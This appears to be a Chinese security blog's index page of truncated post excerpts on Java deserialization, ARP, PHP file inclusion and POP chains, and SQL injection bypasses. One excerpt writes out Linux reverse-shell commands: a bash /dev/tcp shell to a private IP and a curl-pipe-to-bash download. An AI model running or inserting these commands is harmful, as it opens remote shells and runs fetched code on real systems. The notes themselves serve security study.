Commons Collections 背景介绍 Apache Commons是Apache软件基金会的项目，曾经隶属于Jakarta项目。Commons的目的是提供可重用的、解决各种实际的通用问题且开源的Java代码。Commons由三部分组成：Proper（是一些已发布的项目）、Sandbox（是一些正在开发的项目）和Dormant（是一些刚启…

类的动态加载 类加载 类加载的时机 类加载，即虚拟机加载.class文件。什么时候虚拟机需要开始加载一个类呢？虚拟机对此没有规范约束，交给虚拟机把握。 Javac原理 javac是用于将源码文件.java编译成对应的字节码文件.class。 其步骤是：源码——>词法分析器组件（生成token流）——>语法分析器组件（语法树）——>语义分析器组件（注…

什么是序列化与反序列化？ Java序列化是指把Java对象转换为字节序列的过程 而Java反序列化是指把字节序列恢复为Java对象的过程。 序列化分为两大部分: 序列化和反序列化。 序列化是这个过程的第一部分，将数据分解成字节流，以便存储在文件中或在网络上传输。 反序列化就是打开字节流并重构对象。对象序列化不仅要将基本数据类型转换成字节表示，有时还…

前置知识 Arp协议 arp（英语：Address Resolution Protocol，缩写：ARP）是一个通过解析网络层地址来找寻数据链路层地址的网络传输协议，它在IPv4中极其重要。ARP最初在1982年的RFC 826（征求意见稿）[1]中提出并纳入互联网标准STD 37。ARP也可能指是在多数操作系统中管理其相关地址的一个进程。…

相关函数 php中引发文件包含漏洞的通常是以下四个函数： - include() - include_once() - require() - require_once() reuqire() 如果在包含的过程中有错，比如文件不存在等，则会直接退出，不执行后续语句。 include() 如果出错的话，只会提出警告，会继续执行后续语句。 requir…

PHP反序列化链 PoP链的核心，就是魔术方法。而php的魔术方法中涉及到反序列化的大致有以下几种： __destruct: 析构函数，会在到某个对象的所有引用都被删除或者当对象被显式销毁时执行。一般来说，也是Pop链的入口。 __toString: 类对象遇到字符串操作时触发。 __wakeup: 类实例反序列化时触发。 __call： 当调用了…

Linux反弹shell bash bash -i >& /dev/tcp/192.168.0.135/4444 0>&1 curl curl 192.168.0.135/shell | bash shell文件内容 bash -i >& /dev/tcp/192.168.0.135/4444 0>&…

一、开闭原则（Open-Closed Principle，OCP） 1、开闭原则定义 开闭原则：一个软件实体如类、模块应该对扩展开放，对修改关闭。即在不修改软件实体的基础上去扩展其功能。 Open（Open for extension）：软件实体的行为必须是开放的、支持扩展的，而不是僵化的。 Closed（Closed for modificati…

常见的几个HTTP IP头 x-forwarded-for x-remote-IP x-originating-IP x-remote-ip x-remote-addr x-client-ip x-client-IP Client-ip X-Real-ip SQL Injection SQL绕过 空格被过滤 %20 %09 %0a %0b %0c …